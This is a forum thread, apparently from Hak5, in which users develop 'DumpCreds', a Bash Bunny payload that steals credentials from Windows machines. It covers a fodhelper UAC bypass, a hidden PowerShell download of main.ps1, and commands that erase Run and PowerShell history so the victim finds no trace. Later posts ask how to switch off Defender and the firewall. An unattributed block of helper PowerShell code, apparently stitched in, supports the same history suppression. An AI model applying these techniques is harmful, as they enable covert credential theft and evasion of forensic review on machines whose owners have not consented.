Feuermagier Posted September 13, 2017

Ok, further improvements:
A: Cleared history of "Run" (Win+R) by payload.txt
B: Clear PowerShell history (rm $env:Appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt) by main.ps1

I would like to move it into the main payload.txt, but the Bunny is making problems: he seems to be confused by the rm $env:Appdata. (He refuses to type the $ symbol.) Also I had problems with stacking it into the last command executed by payload.txt (the one that loads main.ps1). Maybe you can get it implemented in that line, so we leave no trace even in case of unsuccessful loading.

https://github.com/Valentin-Metz/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
qdba (Author) Posted September 13, 2017

23 minutes ago, Feuermagier said:
Ok, further improvements: A: Cleared history of "Run" (Win+R) by payload.txt. B: Clear PowerShell history (rm $env:Appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt) by main.ps1. I would like to move it into the main payload.txt, but the Bunny is making problems: he seems to be confused by the rm $env:Appdata. (He refuses to type the $ symbol.) Also I had problems with stacking it into the last command executed by payload.txt (the one that loads main.ps1). Maybe you can get it implemented in that line, so we leave no trace even in case of unsuccessful loading. https://github.com/Valentin-Metz/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds

The code for clearing the "Run" history was already in main.ps1:

.........
# Empty Run input field
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
........

Added the code to clear the PowerShell history to main.ps1.

We should avoid too many "Q GUI r" commands, because it's visible.
Feuermagier Posted September 13, 2017

I did some testing, and the "powershell -w h" showed up in Run after completion, so I added it to payload.txt. We only use GUI + r once; I personally prefer to completely avoid the log by using GUI without r.
qdba (Author) Posted September 13, 2017

13 minutes ago, Feuermagier said:
I did some testing, and the "powershell -w h" showed up in Run after completion, so I added it to payload.txt. We only use GUI + r once; I personally prefer to completely avoid the log by using GUI without r.

Q GUI didn't work for me. Q GUI r does. Now we have only the taskkill powershell command in the PowerShell history.
Feuermagier Posted September 13, 2017

59 minutes ago, qdba said:
Q GUI didn't work for me. Q GUI r does. Now we have only the taskkill powershell command in the PowerShell history.

Maybe we can send the taskkill and the delete in a single, stacked command.
qdba (Author) Posted September 13, 2017

2 minutes ago, Feuermagier said:
Maybe we can send the taskkill and the delete in a single, stacked command.

Got it... With Set-PSReadlineOption -HistorySaveStyle SaveNothing the history saving in PowerShell is switched off. So I set it at the beginning of the script and delete the history file at the end.
Feuermagier Posted September 13, 2017

Just now, qdba said:
Got it... With Set-PSReadlineOption -HistorySaveStyle SaveNothing the history saving in PowerShell is switched off. So I set it at the beginning of the script and delete the history file at the end.

Why save nothing if we delete anyway? I thought more of kill PowerShell and delete file in a double command, so that it is clear. Also we have to switch the history back on, because the user will have permanently no history, which is suspicious.
qdba (Author) Posted September 13, 2017

1 minute ago, Feuermagier said:
Why save nothing if we delete anyway? I thought more of kill PowerShell and delete file in a double command, so that it is clear. Also we have to switch the history back on, because the user will have permanently no history, which is suspicious.

It cannot be done in the line with the main.ps1 call because:

A first PowerShell task is started for the input of the registry command for the UAC bypass. Then fodhelper opens a second PowerShell task in admin mode. The first PowerShell task can be closed after the fodhelper thing. The string Q STRING "powershell -exec bypass -W HIDDEN \"while (1) { If (Test-Connection 172........ will be "quacked" into the second PS task. A third PS task is opened, waits for the HTTP server to come up and downloads main.ps1. The second task is closed with the "exit" at the end of the main.ps1 line.

If you remove the history between the main.ps1 call and the exit command it's too fast: main.ps1 is still running and creates new history events. main.ps1 is finished when the EOF file has been created in the loot dir (payload.txt: line 95). The computer can be cleaned after this event.

So...
1. The history must be switched off at the very beginning, before the registry command of the UAC bypass. Consideration: does the Set-PSReadlineOption -HistorySaveStyle SaveNothing command switch off the history globally? If so... good... if not, set a marker in the history file.
2. Do all the stuff.....
3. Problem: switch the history back on after the EOF has been written. Maybe this can be done by switching ATTACKMODE to HID and doing all the things in a GUI (r?), or by starting a DOS command line at the end of main.ps1 to do all the cleanup (switch on, on the command line: kill PowerShell, copy back a saved history file, delete all lines from the marker to the end, or.... / and... other things).

Will sleep after that...
Feuermagier Posted September 13, 2017

I don't think PowerShell scripts are creating history. Or were you already deleting those?
qdba (Author) Posted September 13, 2017

13 minutes ago, Feuermagier said:
I don't think PowerShell scripts are creating history. Or were you already deleting those?

I must check if the command for switching off the history is still in the history file after execution. Can't do it now. Have no PowerShell here. The result gives me the route for the rest.
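The history handling the last few posts circle around, as an added example that is neither qdba's main.ps1 nor anything from the DumpCreds repo: the first function reports what the Explorer RunMRU key (the one main.ps1 empties) and the PSReadLine options currently hold, the second wraps a script block so that HistorySaveStyle is SaveNothing only while the block runs and the user's previous setting is restored afterwards, which is Feuermagier's objection to leaving history permanently off. The function names Get-ShellHistoryState and Invoke-WithoutHistory are my own; the registry key, the MRUList value layout and the PSReadLine cmdlets are the standard ones. Two points the code relies on: Set-PSReadLineOption is per session, not a machine-wide switch, so qdba's question about a global effect is answered in the negative, and PSReadLine is only loaded by an interactive console host, so a script started with -File or -Command in a hidden window has no PSReadLine and writes nothing to ConsoleHost_history.txt, which is what Feuermagier suspected. On the vanishing $ in payload.txt: that file is a bash script, so inside a double-quoted Q STRING bash most likely expands $env to nothing before the Bunny ever types it; single quotes or \$ keep it.

```powershell
# Added example, not part of the DumpCreds payload. Assumes Windows PowerShell 5.x
# with the PSReadLine module loaded (interactive console); function names are mine.

function Get-ShellHistoryState {
    # PSReadLine is only present in an interactive console host; a script launched
    # with -File/-Command in a hidden window has no PSReadLine and records nothing.
    $opt = $null
    if (Get-Module -Name PSReadLine) { $opt = Get-PSReadLineOption }
    $style = $null; $path = $null; $exists = $false
    if ($opt) {
        $style  = $opt.HistorySaveStyle
        $path   = $opt.HistorySavePath
        $exists = Test-Path -LiteralPath $path
    }

    # RunMRU layout: MRUList is the ordering (most recent first); each letter in it
    # names a value holding one Run entry, stored with a trailing "\1".
    $runMru = @()
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (Test-Path -LiteralPath $key) {
        $props = Get-ItemProperty -LiteralPath $key
        foreach ($ch in ([string]$props.MRUList).ToCharArray()) {
            $v = $props.PSObject.Properties[[string]$ch]
            if ($v) { $runMru += ($v.Value -replace '\\1$', '') }
        }
    }

    [pscustomobject]@{
        PSReadLineLoaded  = [bool]$opt
        HistorySaveStyle  = $style
        HistorySavePath   = $path
        HistoryFileExists = $exists
        RunMRU            = $runMru
    }
}

function Invoke-WithoutHistory {
    param([Parameter(Mandatory)][scriptblock]$Body)
    # Set-PSReadLineOption applies to this session only; other consoles keep saving.
    if (-not (Get-Module -Name PSReadLine)) { return & $Body }
    $previous = (Get-PSReadLineOption).HistorySaveStyle
    Set-PSReadLineOption -HistorySaveStyle SaveNothing
    try   { & $Body }
    finally {
        # Restore whatever the user had (normally SaveIncrementally) so the session
        # does not stay history-less after we are done.
        Set-PSReadLineOption -HistorySaveStyle $previous
    }
}

# Usage:
Get-ShellHistoryState | Format-List
Invoke-WithoutHistory { Get-Date }   # runs with history saving off, then restored
```

Run Get-ShellHistoryState once from a normal console and once via powershell -Command to see the difference in PSReadLineLoaded; that is the quickest way to settle whether the hidden-window tasks in payload.txt can leave anything in the history file at all.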
PoSHMagiC0de Posted September 13, 2017

Hmm, I keep seeing déjà vu when I read through that main.ps1 :-P Anyway, I may be touching this script a lot to make some changes. I see some improvements. I need to mess with the fodhelper bypass technique first though to see what is going on. I know the Windows 7 Eventviewer bypass technique but have only read about the fodhelper one. I just have... ideas. If the clouds of work break this week, I will spin something out. Where is the original repo so I can just contribute there? I will let you push it up to Hak5 if any changes I make meet your liking.
qdba (Author) Posted September 21, 2017

OK.... Some new changes (beta state). Better cleanup:
- remove all changes in PowerShell history
- remove all changes in Run MRU (not only delete the files)

https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
JediMasterX Posted September 23, 2017

Thanks! JMX
qdba (Author) Posted September 25, 2017

Added multiple UAC modes. Set the variable UAC_MODE in payload.txt:
UAC_MODE=1 # Fodhelper UAC
UAC_MODE=0 # Standard UAC mode

Just beta (works on my Windows 10, not tested on 7 yet).
FredHilbert Posted October 30, 2017

Thank you @qdba. One of the best payloads in my opinion!!
UnLo Posted November 5, 2017

Still only works on fw 1.1?
m40295 Posted November 6, 2017

14 hours ago, UnLo said:
Still only works on fw 1.1?

1.1+: any firmware 1.1 or higher.
UnLo Posted November 6, 2017

8 hours ago, m40295 said:
1.1+: any firmware 1.1 or higher.

Yep. My bad. Completely missed the (+).
Spoonman Posted April 16, 2018

I got it working on Windows 10 Pro edition. However, it only worked when the firewall was off; with it on it was unable to get an IP. Any idea? Is there a payload that can turn Windows Defender off?
TwistedPacket Posted April 17, 2018

Hello, I am on the latest fw and have an odd issue. When I plug in the BB it turns green for a few seconds like it's booting, then does nothing at all if I have the switch selected for DumpCreds. I would think that the LED would come on, but it never does. I have tested a lot of other payloads and have never seen this happen. Does anyone have any ideas? Thanks!
heartbleed Posted May 18, 2018

Is Firefox working for you? I can only see the creds dumped from Chrome....
Prometheus1621 Posted July 10, 2018

On 4/16/2018 at 2:20 PM, Spoonman said:
I got it working on Windows 10 Pro edition. However, it only worked when the firewall was off; with it on it was unable to get an IP. Any idea? Is there a payload that can turn Windows Defender off?

You can easily make a simple add-on to have PowerShell turn it off and back on at the end.
Kalierko Posted January 23, 2019

On 7/10/2018 at 11:49 PM, Prometheus1621 said:
You can easily make a simple add-on to have PowerShell turn it off and back on at the end.

Please, where can I insert this add-on?
This topic is now archived and is closed to further replies.